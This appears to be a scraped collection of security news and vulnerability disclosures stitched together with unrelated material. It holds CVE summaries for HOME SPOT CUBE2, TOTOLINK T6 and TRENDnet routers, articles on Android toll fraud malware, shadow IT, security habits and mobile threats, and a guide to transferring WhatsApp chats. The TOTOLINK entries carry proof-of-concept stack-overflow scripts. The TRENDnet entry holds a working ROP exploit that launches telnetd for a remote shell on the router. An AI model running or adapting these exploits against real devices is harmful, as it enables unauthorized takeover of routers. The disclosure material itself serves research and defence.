HOME SPOT CUBE2 V102 contains an OS command injection vulnerability due to improper processing of data received from DHCP server. An adjacent attacker may execute an arbitrary OS command on the product if a malicious DHCP server is placed on the WAN side of the product.

HOME SPOT CUBE2（以下「CUBE2」）は、メーカーサポートの終了に伴い、ソフトウエアアップデートなどのサポートを終了させていただいておりますが、ご利用上ご注意いただきたいことがありご案内させていただきます。

このたび、CUBE2において、WAN側からIPアドレスを取得する際に使用するDHCPのやり取りにおいて、不適切な文字列が入った場合、お客さまの意図しない設定変更や動作が引き起こされる可能性があることがわかっております。

CVE-2022-33948: HOME SPOT CUBE2（ホームスポットキューブツー） | 宅内Wi-Fiルーターをお使いの方

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the desc parameter in the function FUN_004137a4.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_004137a4 (at address 0x4137a4) gets the JSON parameter desc, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import \*
import json

data \= {
    "topicurl": "setting/setWiFiAclRules",
    "addEffect": "1",
    "mac": "12:34:56:78",
    "desc": 'A'\*0x500,
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32052: IoT-vuln/Totolink/T6-v2/3.setWiFiAclRules at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the password parameter in the function FUN_00413f80.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_00413f80 (at address 0x413f80) gets the JSON parameter password, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

The program gets the JSON parameter encrypt, password, opmode. When encrypt is equal to WEP and opmode is equal to rpt, the program will enter the branch at line 268.

from pwn import \*
import json

data \= {
    "topicurl": "setting/setWiFiRepeaterCfg",
    "opmode": "rpt",
    "encrypt": "WEP",
    "password": "A"\*0x400,
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32044: IoT-vuln/Totolink/T6-v2/5.setWiFiRepeaterCfg at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the desc parameter in the function FUN_00413be4.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_00413be4 (at address 0x413be4) gets the JSON parameter desc, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import \*
import json

data \= {
    "topicurl": "setting/setWiFiScheduleCfg",
    "addEffect": "1",
    "enable": "1",
    "desc": "A"\*0x400,
    "week": "1",
    "sHour": "1",
    "sMinute": "1",
    "eHour": "1",
    "eMinute": "1",
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32045: IoT-vuln/Totolink/T6-v2/4.setWiFiScheduleCfg at main · d1tto/IoT-vuln

Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis.
Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent

Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis.

Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent.

It's also different from other fleeceware threats in that the malicious functions are only carried out when a compromised device is connected to one of its target network operators.

"It also, by default, uses cellular connection for its activities and forces devices to connect to the mobile network even if a Wi-Fi connection is available," Dimitrios Valsamaras and Sang Shin Jung of the Microsoft 365 Defender Research Team said in an exhaustive analysis.

"Once the connection to a target network is confirmed, it stealthily initiates a fraudulent subscription and confirms it without the user's consent, in some cases even intercepting the one-time password (OTP) to do so."

Such apps are also known to suppress SMS notifications related to the subscription to prevent the victims from becoming aware of the fraudulent transaction and unsubscribing from the service.

At its core, toll fraud takes advantage of the payment method which enables consumers to subscribe to paid services from websites that support the Wireless Application Protocol (WAP). This subscription fee gets charged directly to the users' mobile phone bills, thus obviating the need for setting up a credit or debit card or entering a username and password.

"If the user connects to the internet through mobile data, the mobile network operator can identify him/her by IP address," Kaspersky noted in a 2017 report about WAP billing trojan clickers. "Mobile network operators charge users only if they are successfully identified."

Optionally, some providers can also require OTPs as a second layer of confirmation of the subscription prior to activating the service.

"In the case of toll fraud, the malware performs the subscription on behalf of the user in a way that the overall process isn't perceivable," the researchers said. "The malware will communicate with a \[command-and-control\] server to retrieve a list of offered services."

It achieves this by first turning off Wi-Fi and turning on mobile data, followed by making use of JavaScript to stealthily subscribe to the service, and intercepting and sending the OTP code (if applicable) to complete the process.

The JavaScript code, for its part, is designed to click on HTML elements that contain keywords such as "confirm," "click," and "continue" to programmatically initiate the subscription.

Upon a successful fraudulent subscription, the malware either conceals the subscription notification messages or abuses its SMS permissions to delete incoming SMS messages containing information about the subscribed service from the mobile network operator.

Toll fraud malware is also known to cloak its malicious behavior by means of dynamic code loading, a feature in Android that allows apps to pull additional modules from a remote server during runtime, making it ripe for abuse by malicious actors.

From a security standpoint, this also means that a malware author can fashion an app such that the rogue functionality is only loaded when certain prerequisites are met, effectively defeating static code analysis checks.

"If an app allows dynamic code loading and the dynamically loaded code is extracting text messages, it will be classified as a backdoor malware," Google lays out in developer documentation about potentially harmful applications (PHAs).

With an install rate of 0.022%, toll fraud apps accounted for 34.8% of all PHAs installed from the Android app marketplace in the first quarter 2022, ranking below spyware. Most of the installations originated from India, Russia, Mexico, Indonesia, and Turkey.

To mitigate the threat of toll fraud malware, it's recommended that users install applications only from the Google Play Store or other trusted sources, avoid granting excessive permissions to apps, and consider upgrading to a new device should it stop receiving software updates.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns About Evolving Capabilities of Toll Fraud Android Malware Apps

Shadow IT refers to the practice of users deploying unauthorized technology resources in order to circumvent their IT department. Users may resort to using shadow IT practices when they feel that existing IT policies are too restrictive or get in the way of them being able to do their jobs effectively.
An old school phenomenon 
Shadow IT is not new. There have been countless examples of

Shadow IT refers to the practice of users deploying unauthorized technology resources in order to circumvent their IT department. Users may resort to using shadow IT practices when they feel that existing IT policies are too restrictive or get in the way of them being able to do their jobs effectively.

**An old school phenomenon**

Shadow IT is not new. There have been countless examples of widespread shadow IT use over the years. In the early 2000s, for example, many organizations were reluctant to adopt Wi-Fi for fear that it could undermine their security efforts. However, users wanted the convenience of wireless device usage and often deployed wireless access points without the IT department's knowledge or consent.

The same thing happened when the iPad first became popular. IT departments largely prohibited iPads from being used with business data because of the inability to apply group policy settings and other security controls to the devices. Even so, users often ignored IT and used iPads anyway.

Of course, IT pros eventually figured out how to secure iPads and Wi-Fi and eventually embraced the technology. However, shadow IT use does not always come with a happy ending. Users who engage in shadow IT use can unknowingly do irreparable harm to an organization.

Even so, the problem of shadow IT use continues to this day. If anything, shadow IT use has increased over the last several years. In 2021 for example, Gartner found that between 30% and 40% of all IT spending (in a large enterprise) goes toward funding shadow IT.

**Shadow IT is on the rise in 2022****Remote work post-pandemic**

One reason for the rise in shadow IT use is remote work. When users are working from home, it is easier for them to escape the notice if the IT department than it might be if they were to try using unauthorized technology from within the corporate office. A study by Core found that remote work stemming from COVID requirements increased shadow IT use by 59%.

**Tech is getting simpler for end-users**

Another reason for the increase in shadow IT is the fact that it is easier than ever for a user to circumvent the IT department. Suppose for a moment that a user wants to deploy a particular workload, but the IT department denies the request.

A determined user can simply use their corporate credit card to set up a cloud account. Because this account exists as an independent tenant, IT will have no visibility into the account and may not even know that it exists. This allows the user to run their unauthorized workload with total impunity.

In fact, a 2020 study found that 80% of workers admitted to using unauthorized SaaS applications. This same study also found that the average company's shadow IT cloud could be 10X larger than the company's sanctioned cloud usage.

**Know your own network**

Given the ease with which a user can deploy shadow IT resources, it is unrealistic for IT to assume that shadow IT isn't happening or that they will be able to detect shadow IT use. As such, the best strategy may be to educate users about the risks posed by shadow IT. A user who has a limited IT background may inadvertently introduce security risks by engaging in shadow IT. According to a Forbes Insights report 60% of companies do not include shadow IT in their threat assessments.

Similarly, shadow IT use can expose an organization to regulatory penalties. In fact, it is often compliance auditors – not the IT department – who end up being the ones to discover shadow IT use.

Of course, educating users alone is not sufficient to stopping shadow IT use. There will always be users who choose to ignore the warnings. Likewise, giving in to user's demands for using particular technologies might not always be in the organization's best interests either. After all, there is no shortage of poorly written or outdated applications that could pose a significant threat to your organization. Never mind applications that are known for spying on users.

**The zero-trust solution to Shadow IT**

One of the best options for dealing with shadow IT threats may be to adopt zero trust. Zero-trust is a philosophy in which nothing in your organization is automatically assumed to be trustworthy. User and device identities must be proven each time that they are used to access a resource.

There are many different aspects to a zero-trust architecture, and each organization implements zero-trust differently. Some organizations for instance, use conditional access policies to control access to resources. That way, an organization isn't just granting a user unrestricted access to a resource, but rather is considering how the user is trying to access the resource. This may involve setting up restrictions around the user's geographic location, device type, time of day, or other factors.

**Zero-trust at the helpdesk**

One of the most important things that an organization can do with regard to implementing zero trust is to better secure its helpdesk. Most organizations' help desks are vulnerable to social engineering attacks.

When a user calls and requests a password reset, the helpdesk technician assumes that the user is who they claim to be, when in reality, the caller could actually be a hacker who is trying to use a password reset request as a way of gaining access to the network. Granting password reset requests without verifying user identities goes against everything that zero trust stands for.

Specops Software's Secure Service Desk can eliminate this vulnerability by making it impossible for a helpdesk technician to reset a user's password until that user's identity has been proven. You can test it out for free to reduce the risks of shadow IT in your network.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

What is Shadow IT and why is it so risky?

Shrav Mehta, CEO, Secureframe, outlines the top six bad habits security teams need to break to prevent costly breaches, ransomware attacks and prevent phishing-based endpoint attacks.

Shrav Mehta, CEO, Secureframe, outlines the top six bad habits security teams need to break to prevent costly breaches, ransomware attacks and prevent phishing-based endpoint attacks.

Cybercrime is on the rise, and attacks are getting faster, more nuanced and increasingly sophisticated. The number of cyberattack-related data breaches rose 27 percent in 2021 — an upward trend that shows no signs of slowing down.

Bad security habits, such as using the same password more than once may seem innocuous, but unchecked bad behavior or security habits can leave your organization open to a devastating breach.

Bad security habits cost businesses millions of dollars. Consider this, the average cost of a data breach reached $4.24 million per incident in 2021, the highest in 17 years.

If a hacker compromises your servers and steals confidential data, it could spell the end of your company. This list covers 6 of the most common bad security habits and how to fix them so you can protect your data and prevent malicious attacks.

**1\. Poor Password Hygiene**

More than 60 percent of all data breaches involve stolen or weak credentials. Using the same password, sharing passwords, writing passwords down on sticky notes — as security leaders, we’ve seen the same terrible password practices for years. Don’t make attackers’ jobs easier!

**Break the habit**: Establish a company-wide password policy, use a password manager, and enable multi-factor authentication to reduce the risk of unauthorized account access. Your password policy should include guidelines on creating strong passwords, how often passwords should be updated, and instructions on how to securely share passwords between employees.

**2\. Convoluted Processes and Policies**

From onboarding checklists to privacy policies, these documents should reflect how your team gets work done and be used during daily work — not drafted and then forgotten in a folder somewhere. You must think about these policies regularly and make improvements based on the challenges and risks observed.

**Break the habit:** Establish periodic policy reviews and acceptances for your team. Proactively ask for feedback to ensure the policies and processes reflect how your team actually gets work done and to garner company-wide buy-in.

**3\. Outdated Software and Non-secure Devices**

Remote work has been a growing trend for years, but the last two years have seen a seismic shift in where, when, and how teams work together. For all its benefits, the rise of work from home also brings significant security challenges.

More people are using unsecured Wi-Fi, mixing work and personal devices, skipping regular data backups and software updates, etc. Being the weakest link that ultimately brings your company to its knees will not be an enjoyable experience.

**Break the habit:** Use a device management solution for automatic software updates and patches, establish a mobile device policy, and encourage staff only to use company devices and a secure VPN to access sensitive data.

**4\. Lack of an Internal Audit Program**

Even if you’ve established appropriate security policies and procedures, you must treat them as living documents. Continuous testing and regular internal audits are essential to understanding how your security program is maturing (or not) and staying aware of emerging and escalating threats.

**Break the habit:** Create an internal audit program to review your security posture at least annually and identify opportunities for improvement. This will also ensure you stay aware of any changes to the threat landscape that you need to address.

**5\. Untrained Staff**

Phishing and malware are some of the most common sources of security incidents, including ransomware! Train staff on security best practices regularly and ensure everyone knows security is a company-wide priority.

**Break the habit:** Conduct security awareness training at least annually. Randomly and periodically test your employees/users to ensure they stay aware of and follow best practices.

**6\. Complacency**

Too many organizations believe that a breach or security incident won’t actually happen to them. Security and compliance is not just a concern for the IT department. Everyone across the organization — from the executive team and board of directors to the newest employee hire — should understand the threats facing the business and their roles and responsibilities in keeping customer and company data safe.

**Break the habit:** Make the effort to create a culture that prioritizes security and understands its importance. Ensure all employees understand their roles and responsibilities regarding keeping customer and business information safe and clearly communicate the benefits of following established policies and procedures.

Most security threats and risks are systemically preventable and can be addressed through common-sense approaches, continuous compliance testing, assessments, audits, and measurement. The more you can train your employees on these practical approaches, the more likely they will be able to successfully avoid a costly data breach or security incident.

**_Shrav Mehta, CEO, Secureframe, an automation compliance platform._**

Top Six Security Bad Habits, and How to Break Them

Your smartphone is your daily companion. The chances are that most of our activities rely on them, from ordering food to booking medical appointments. However, the threat landscape always reminds us how vulnerable smartphones can be. 
Consider the recent discovery by Oversecured, a security startup. These experts observed the dynamic code loading and its potential dangers. Why is this a problem?

Your smartphone is your daily companion. The chances are that most of our activities rely on them, from ordering food to booking medical appointments. However, the threat landscape always reminds us how vulnerable smartphones can be.

Consider the recent discovery by Oversecured, a security startup. These experts observed the dynamic code loading and its potential dangers. Why is this a problem? Well, the Google app uses code that does not come integrated with the app itself. Okay, this might sound confusing, but it all works in favor of optimizing certain processes. Thus, Google exploits code libraries pre-installed on Android phones to reduce their download size. In fact, many Android apps use this trick to optimize the storage space needed to run.

As revealed by Oversecured, perpetrators could compromise this retrieval of code from libraries. Instead of Google obtaining code from a reliable source, it could be tricked into taking code from malicious apps operating on the device in question. Thus, the malicious app could gain the same permissions as Google. And the latter giant typically gets access to your email, search history, call history, contacts, and more.

The scariest part: everything can happen without your knowledge. Let's discuss other spooky threats currently daunting mobile devices.

**Top Mobile Security Threats****Data Leaks**

When you download a new app on your smartphone and launch it, you must pay attention to the pop screen that appears. It is a permission popup, the request of providing a few permissions to the app. Sadly, granting extensive permissions to dangerous apps can have severe consequences. Hackers can hack the database where all this information is stored, and all your data can be leaked.

But, with some recent development in Android 11 and IOS 14, users can deny unnecessary permission requests or even grant them for one time only. Never give apps all the permissions, see what permission they need to run, and grant only those.

Therefore, it is crucial to protect the device by not using any public Wi-Fi hotspot. Remember, never get lured by a "Free Wi-Fi" hung hanged in any coffee shop, restaurant, or hotel.

**Spyware Pretending to be an Update**

Bug fixes, longevity, and overall safety boost are the three main reasons why you should always update your OS. However, there are cases when you must fight this instinct. If you find a random application called System Update, be wary of its true nature. As reported, this malicious Android threat pretends to be a system update. Sadly, its true intentions are much more sinister. Once installed (outside Google Play, which is already a dangerous practice), the app starts stealing victims' data. How? Well, it connects to the perpetrators' Firebase server, the tool used to take remote control of the infected device.

What can this spyware steal? Basically, anything. Your messages, contacts, browser bookmarks, and more are up for grabs. An even more frightening reality is that it can record phone calls, monitor your location, and steal photos.

**Malware via SMS Messages**

We all know the feeling of receiving bizarre SMS messages. But sometimes, such attempts are nothing but social engineering scams. A recently discovered TangleBot is one of the recent examples, stepping into the mobile threat landscape.

Apparently, the malware gets distributed via fake messages sent to users across the US and Canada. Mostly, they provide certain COVID-19 information and urge recipients to click on embedded links. If users click on the link, they are led into a website urging them to install an Adobe Flash update. If you decide to install it, TangleBot proudly enters your system. What can it do? Many things, from stealing data and taking control over certain apps.

**How to Defend Your Device?**

*   **Use updated operating systems**. Use only the latest operating systems like Android 11 and 12, as they have the newest security codes. However, install updates from reliable sources only. A random app floating online is not the right choice to keep your device up to date.
*   **Firewalls**. Always have a firewall securing your device. It works like a regular firewall. When your mobile device sends a request to a network, the firewall forwards a verification request to the network. Additionally, it contacts the database to verify the device.
*   **Be careful on app stores**. Even if you trust Google Play Store, do not install every app available. It is a known fact that many applications available are far from reliable. For instance, you could accidentally download cryptocurrency mining malware, banking Trojans, or intrusive adware.
*   **Use a VPN**. If you are in a position where you cannot avoid the use of public Wi-Fi, you need to download VPN apps. They will hide all your activities from hackers lurking on the network, and it will protect your sensitive information.
*   **Do not jailbreak your device**. iPhones can be somewhat restrictive. Thus, many might consider jailbreaking them to get the opportunity to customize their devices. However, a jailbroken smartphone is more vulnerable; you will likely lose your warranty and struggle to install the necessary updates.

**Conclusion**

The mobile threats are evolving with time, and they will keep on improving further as well. But that's not what we have to care about. The only thing that needs our concern is our security and privacy. Therefore, one must take all the precautionary measures to evade potential danger.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Overview of Top Mobile Security Threats in 2022

TRENDnet Wi-Fi routers TEW751DR v1.03 and TEW-752DRU v1.03 were discovered to contain a stack overflow via the function genacgi_main.

Vendor of the products:TRENDnet

Reported by: 　　　WangJincheng && FeiXincheng from X1cT34m

Affected products: TRENDnet TEW751DR <= v1.03 , TRENDnet TEW-752DRU <= v1.03

Vendor Homepage: https://www.trendnet.com/

Vendor Advisory: https://www.trendnet.com/support/support-detail.asp?prod=165\_TEW-751DR , https://www.trendnet.com/support/support-detail.asp?prod=170\_TEW-752DRU

**summarize**

The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the TrendNet Wi-Fi router firmware TEW751DR TEW-752DRU . In the genacgi_main function of the cgibin program, the sprintf method directly uses the service parameter from /gena.cgi. The attackers can construct a payload to carry out arbitrary code attacks.

**vulnerability description**

There is a stack overflow vulnerability in the genacgi_main function.

It calls the sub_40EC1C function.

However, in the sub_40EC1C function, it calls the sprintf function from a1 to v23 without any security check, which causes the stack overflow.

**poc**

    # python3
    from pwn import *
    from socket import *
    from os import *
    from time import *
    context(os = 'linux', arch = 'mips')
    
    libc_base = 0x2aaf8000
    
    s = socket(AF_INET, SOCK_STREAM)
    
    cmd = b'telnetd -p 7777;'
    payload = b'a'*462
    payload += p32(libc_base + 0x53200 - 1) # s0  system_addr - 1
    payload += p32(libc_base + 0x169C4) # s1  addiu $s2, $sp, 0x18 (=> jalr $s0)
    payload += b'a'*4 # s2
    payload += p32(libc_base + 0x32A98) # ra  addiu $s0, 1 (=> jalr $s1)
    payload += b'a'*0x18 # padding
    payload += cmd
    
    msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
    msg += b"Host: localhost:49152\r\n"
    msg += b"SID: 1\r\n\r\n"
    
    s.connect((gethostbyname("192.168.10.1"), 49152))
    s.send(msg)
    	
    sleep(1)
    system("telnet 192.168.10.1 7777")

CVE-2022-33007: CVE/bufferoverflow.md at main · fxc233/CVE

It's never been easier to switch between iPhone and Android—and to get your messages out of the Meta ecosystem entirely.

Since early 2016, WhatsApp has protected messages and conversations sent in its app with end-to-end encryption. This means that nobody other than the sender and receiver of messages can read their content—not even Meta can read or snoop on the contents of your conversations.

Despite WhatsApp being omnipresent—more than 2 billion people use it each month—securely moving your encrypted chats and photos to different platforms or apps has been a challenge. Transferring your WhatsApp chats from Android to iPhone and from iPhone to Android has historically only been possible using third-party apps. These apps are often fiddly and don’t necessarily protect your data at the level offered by WhatsApp’s ecosystem.

But in recent months WhatsApp has made it possible to officially switch between iPhones and Android (and vice versa), rolling out processes to securely move data between operating systems and working with phone manufacturers to enable the move.

If you’re fed up with Meta’s ecosystem, it’s also possible to move your groups and some chat data to other messaging apps. Here’s how to move all of your WhatsApp chats and backups.

Android to iPhone

Moving your WhatsApp account from Android to an iPhone involves a few steps. But it should be possible to bring most of your information with you: Your profile photo, individual and group chats, history, photos, videos, and settings can all make the jump from one device to another. Your call history and display name can’t be moved across, however, WhatsApp says.

Most of the work in moving your WhatsApp data comes before you make the shift. To move between devices, you need to ensure you have the same phone number on each. Before you start the process, make sure you have a recently updated version of WhatsApp on your Android phone. You also need to be running at least Android 5 on the device you’re moving from and iOS 15.5 on the iPhone you’re moving to. (The iPhone needs to be a new device or have been recently reset to its factory settings.)

Next, download and install the “Move to iOS” app from Google’s Play Store—this Apple-owned app will do all the heavy lifting. When you’re ready to migrate your data, plug both devices into a power source and connect both phones to the same Wi-Fi network. (If you don’t have a Wi-Fi network, it’s possible to use a hotspot to connect your Android phone to the iPhone.)

When both phones are on the same network, open up the “Move to iOS” app on the Android phone and follow the instructions to connect the two phones. Then select WhatsApp as the data source you want to transfer from, and the app will prepare your chats to be moved across—final prompts will confirm you want to make the switch.

This process will log you out of WhatsApp on your Android phone, and you’ll need to download the app on the iPhone you are moving to. When you first use WhatsApp on this iPhone, it’ll ask you to use the same number as on the Android device and prompt you to complete the transfer process. When the process is complete, if you are getting rid of your old phone, make sure to do a factory reset and wipe all your data.

iPhone to Android

It’s been possible to transfer your WhatsApp chat history from iPhones to Android devices since October 2021. This transfer process includes your photos, messages, voice messages, and group conversations.

The compatibility was first rolled out for Samsung phones but has since expanded to include Google Pixel phones and all devices running Android 12. To make the move, you’ll need a USB-C-to-Lightning cable to physically connect the two devices, Google explains. “When prompted while setting up your new Android device, scan a QR code on your iPhone to launch WhatsApp,” the company says in a blog post. Alternatively, in WhatsApp you can go to **Settings** > **Chats** > **Move Chats to Android** and follow the transfer prompts.

WhatsApp’s guide to moving your chats between iPhones and Samsung devices says you will need the Samsung SmartSwitch app installed on the new phone and the same phone number on both devices. As with moving from Android to an iPhone, make sure you delete or wipe your old phone if you’re getting rid of it.

WhatsApp to Signal

Signal is widely considered the best messaging app for security and privacy. Check out our guide to switching your text messages to Signal and moving your messages between devices. While you can’t directly move your WhatsApp chat history to Signal, there are some things you can do to make the switch more straightforward.

It’s possible to easily recreate your WhatsApp groups on Signal—although getting all your family and friends to ditch the Meta-owned app may be more of a challenge. To recreate your groups, open the Signal app and start a new group by tapping the **pencil icon**. When you are asked to add people from your contacts, **tap on Skip** and instead pick the option to get a link to invite people to the group (a QR code is also available). From here, you can share this link with your WhatsApp chats and allow people to move over.

WhatsApp to Telegram

Unlike Signal and WhatsApp, Telegram is not end-to-end encrypted by default. As a result, security experts often warn against using Telegram. However, if you still want to use Telegram, it’s possible to move your chat history from one app to the other.

On both iOS and Android, open the chat you want to move to Telegram and click on the chat’s name or details (using _⋮_ on Android). From here, tap **Export Chat** and when you get the choice of where to **share** the chat, pick Telegram. When exporting chats from WhatsApp to Telegram, you have the choice to take photos and videos with you, or just chat messages.

Back up your WhatsApp chats

You can also back up your WhatsApp conversations in the cloud. This allows you to keep your messages and photos safe if you’re moving from one iPhone to another iPhone or Android to Android—for instance, if you upgrade or break your device and replace it with one using the same operating system.

Until September 2021, WhatsApp didn’t end-to-end encrypt backups, creating a potential security risk and exposing people’s chats to requests from law enforcement. However, the company has since closed that loophole, so it’s now much less of a risk to have your chats backed up to iCloud or Google’s Cloud. To back up to either platform, you will need a Google Drive account or an iCloud account.

On Android, in WhatsApp go to **More options** > **Settings** > **Chats** > **Chat backup** > **Back up to Google Drive**. While on iOS go to WhatsApp **Settings** > **Chats** > **Chat Backup** > **Back Up Now**. You’ll then be able to set the frequency of your backups and elect whether data-heavy videos are included.

Tag

#wifi